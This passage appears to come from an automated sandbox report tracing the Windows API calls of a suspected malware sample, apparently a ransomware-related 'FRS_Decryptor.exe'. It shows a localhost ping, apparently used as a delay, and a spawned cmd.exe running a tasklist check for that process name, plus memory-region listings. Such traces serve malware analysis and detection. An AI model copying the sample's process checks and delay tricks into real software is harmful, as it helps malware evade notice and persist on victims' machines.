lpMode=0x78f238) returned 0 [0103.029] GetLastError () returned 0x6 [0103.029] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f19c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0103.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0103.029] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28910 [0103.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _write (in: _FileHandle=1, _Buf=0xa28910*, _MaxCharCount=0x9 | out: _Buf=0xa28910*) returned 9 [0103.029] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0103.029] LocalFree (hMem=0xa28910) returned 0x0 [0103.029] LocalFree (hMem=0xa37fa0) returned 0x0 [0103.029] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="羠£ﱀx⟘\x94䰨盪✨") returned 0x9 [0103.029] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _get_osfhandle (_FileHandle=1) returned 0x28 [0103.029] GetFileType (hFile=0x28) returned 0x2 [0103.029] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0103.029] GetLastError () returned 0x6 [0103.029] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✨") returned 0x0 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0103.029] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28910 [0103.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _write (in: _FileHandle=1, _Buf=0xa28910*, _MaxCharCount=0x9 | out: _Buf=0xa28910*) returned 9 [0103.029] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.029] LocalFree (hMem=0xa28910) returned 0x0 [0103.029] LocalFree (hMem=0xa37fa0) returned 0x0 [0103.029] Sleep (dwMilliseconds=0x3e8) [0104.032] IcmpSendEcho2Ex (in: IcmpHandle=0xa26c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa2c3b8, RequestSize=0x20, RequestOptions=0x78f2ec, ReplyBuffer=0xa35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa35270) returned 0x1 [0104.032] InetNtopW (in: Family=2, pAddr=0x78f2dc, pStringBuf=0x78f404, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0104.032] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="羠£ﱀx⛔\x94䰨盪✣") returned 0x16 [0104.033] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.033] GetFileType (hFile=0x28) returned 0x2 [0104.033] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0104.033] GetLastError () returned 0x6 [0104.033] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✣") returned 0x0 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.033] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0104.033] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa37fd8 [0104.033] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa37fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _write (in: _FileHandle=1, _Buf=0xa37fd8*, _MaxCharCount=0x16 | out: _Buf=0xa37fd8*) returned 22 [0104.033] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.033] LocalFree (hMem=0xa37fd8) returned 0x0 [0104.033] LocalFree (hMem=0xa37fa0) returned 0x0 [0104.033] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="羠£ﱀx⛿\x94䰨盪✼") returned 0x9 [0104.033] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.033] GetFileType (hFile=0x28) returned 0x2 [0104.033] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0104.033] GetLastError () returned 0x6 [0104.033] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✼") returned 0x0 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.033] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0104.033] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28910 [0104.033] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _write (in: _FileHandle=1, _Buf=0xa28910*, _MaxCharCount=0x9 | out: _Buf=0xa28910*) returned 9 [0104.033] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.033] LocalFree (hMem=0xa28910) returned 0x0 [0104.033] LocalFree (hMem=0xa37fa0) returned 0x0 [0104.033] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x78f274, nSize=0x0, Arguments=0x78f270 | out: lpBuffer="羠£ﱀx➷\x94䰨盪✧") returned 0x9 [0104.033] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.033] _fileno (_File=0x76ea4c28) returned 1 [0104.033] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.033] GetFileType (hFile=0x28) returned 0x2 [0104.033] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f238 | out: lpMode=0x78f238) returned 0 [0104.034] GetLastError () returned 0x6 [0104.034] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f19c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0104.034] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28910 [0104.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _write (in: _FileHandle=1, _Buf=0xa28910*, _MaxCharCount=0x9 | out: _Buf=0xa28910*) returned 9 [0104.034] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.034] LocalFree (hMem=0xa28910) returned 0x0 [0104.034] LocalFree (hMem=0xa37fa0) returned 0x0 [0104.034] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="羠£ﱀx⟘\x94䰨盪✨") returned 0x9 [0104.034] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.034] GetFileType (hFile=0x28) returned 0x2 [0104.034] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0104.034] GetLastError () returned 0x6 [0104.034] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✨") returned 0x0 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0104.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0104.034] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28988 [0104.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa28988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _write (in: _FileHandle=1, _Buf=0xa28988*, _MaxCharCount=0x9 | out: _Buf=0xa28988*) returned 9 [0104.034] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0104.034] LocalFree (hMem=0xa28988) returned 0x0 [0104.034] LocalFree (hMem=0xa37fa0) returned 0x0 [0104.034] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x78f1f8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0104.034] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x78f1cc, nSize=0x0, Arguments=0x78f1c8 | out: lpBuffer="羠£x᧰\x94䰨盪❏") returned 0x5c [0104.034] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.034] GetFileType (hFile=0x28) returned 0x2 [0104.034] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f190 | out: lpMode=0x78f190) returned 0 [0104.034] GetLastError () returned 0x6 [0104.034] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f0f4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0104.034] _fileno (_File=0x76ea4c28) returned 1 [0104.034] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0104.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0104.035] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xa38068 [0104.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xa38068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0104.035] _fileno (_File=0x76ea4c28) returned 1 [0104.035] _write (in: _FileHandle=1, _Buf=0xa38068*, _MaxCharCount=0x5c | out: _Buf=0xa38068*) returned 92 [0104.035] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.035] _fileno (_File=0x76ea4c28) returned 1 [0104.035] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0104.035] LocalFree (hMem=0xa38068) returned 0x0 [0104.035] LocalFree (hMem=0xa37fa0) returned 0x0 [0104.035] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x78f1d8, nSize=0x0, Arguments=0x78f1d4 | out: lpBuffer="羠£xᨧ\x94䰨盪❓") returned 0x61 [0104.035] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.035] _fileno (_File=0x76ea4c28) returned 1 [0104.035] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.035] GetFileType (hFile=0x28) returned 0x2 [0104.035] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f19c | out: lpMode=0x78f19c) returned 0 [0104.035] GetLastError () returned 0x6 [0104.035] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f100, nSize=0x50 | out: lpBuffer="x❓") returned 0x0 [0104.035] _fileno (_File=0x76ea4c28) returned 1 [0104.035] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0104.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0104.035] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xa38070 [0104.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xa38070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0104.035] _fileno (_File=0x76ea4c28) returned 1 [0104.035] _write (in: _FileHandle=1, _Buf=0xa38070*, _MaxCharCount=0x61 | out: _Buf=0xa38070*) returned 97 [0104.035] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.035] _fileno (_File=0x76ea4c28) returned 1 [0104.035] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0104.035] LocalFree (hMem=0xa38070) returned 0x0 [0104.035] LocalFree (hMem=0xa37fa0) returned 0x0 [0104.035] IcmpCloseHandle (IcmpHandle=0xa26c60) returned 1 [0104.035] LocalFree (hMem=0xa2c3b8) returned 0x0 [0104.035] LocalFree (hMem=0xa35270) returned 0x0 [0104.035] WSACleanup () returned 0 [0104.036] exit (_Code=0) Thread: id = 278 os_tid = 0x53c Thread: id = 279 os_tid = 0xa1c Process: id = "98" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x73ff000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5090 start_va = 0xb10000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 5091 start_va = 0xb30000 end_va = 0xb31fff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 5092 start_va = 0xb40000 end_va = 0xb4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 5093 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 5094 start_va = 0xb90000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 5095 start_va = 0xc90000 end_va = 0xc93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 5096 start_va = 0xca0000 end_va = 0xca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 5097 start_va = 0xcb0000 end_va = 0xcb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 5098 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5099 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5100 start_va = 0x7ef60000 end_va = 0x7ef82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef60000" filename = "" Region: id = 5101 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 5102 start_va = 0x7ef8c000 end_va = 0x7ef8cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 5103 start_va = 0x7ef8e000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8e000" filename = "" Region: id = 5104 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5105 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5106 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5107 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5108 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 5109 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5110 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5111 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5112 start_va = 0xb10000 end_va = 0xb1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 5113 start_va = 0xcf0000 end_va = 0xd6dfff entry_point = 0xcf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5114 start_va = 0xe10000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 5115 start_va = 0xfe0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 5116 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5117 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5118 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5119 start_va = 0x7ee60000 end_va = 0x7ef5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee60000" filename = "" Region: id = 5120 start_va = 0xb20000 end_va = 0xb23fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 5121 start_va = 0x12e0000 end_va = 0x15b4fff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5140 start_va = 0xb30000 end_va = 0xb33fff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Thread: id = 280 os_tid = 0x2f8 [0104.060] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0104.060] __set_app_type (_Type=0x1) [0104.060] __p__fmode () returned 0x76ea1768 [0104.060] __p__commode () returned 0x76ea176c [0104.060] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0104.060] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0104.060] GetCurrentThreadId () returned 0x2f8 [0104.060] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x2f8) returned 0x34 [0104.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0104.061] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0104.061] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.062] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.062] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xc8f858 | out: phkResult=0xc8f858*=0x0) returned 0x2 [0104.062] VirtualQuery (in: lpAddress=0xc8f867, lpBuffer=0xc8f800, dwLength=0x1c | out: lpBuffer=0xc8f800*(BaseAddress=0xc8f000, AllocationBase=0xb90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0104.062] VirtualQuery (in: lpAddress=0xb90000, lpBuffer=0xc8f800, dwLength=0x1c | out: lpBuffer=0xc8f800*(BaseAddress=0xb90000, AllocationBase=0xb90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0104.063] VirtualQuery (in: lpAddress=0xb91000, lpBuffer=0xc8f800, dwLength=0x1c | out: lpBuffer=0xc8f800*(BaseAddress=0xb91000, AllocationBase=0xb90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0104.063] VirtualQuery (in: lpAddress=0xb93000, lpBuffer=0xc8f800, dwLength=0x1c | out: lpBuffer=0xc8f800*(BaseAddress=0xb93000, AllocationBase=0xb90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0104.063] VirtualQuery (in: lpAddress=0xc90000, lpBuffer=0xc8f800, dwLength=0x1c | out: lpBuffer=0xc8f800*(BaseAddress=0xc90000, AllocationBase=0xc90000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0104.063] GetConsoleOutputCP () returned 0x1b5 [0104.063] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0104.063] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0104.063] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0104.063] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0104.063] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0104.063] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0104.063] _get_osfhandle (_FileHandle=0) returned 0x24 [0104.063] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0104.063] GetEnvironmentStringsW () returned 0xe140c0* [0104.063] FreeEnvironmentStringsA (penv="=") returned 1 [0104.063] GetEnvironmentStringsW () returned 0xe140c0* [0104.063] FreeEnvironmentStringsA (penv="=") returned 1 [0104.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc8e7a8 | out: phkResult=0xc8e7a8*=0x44) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc8e7b0, 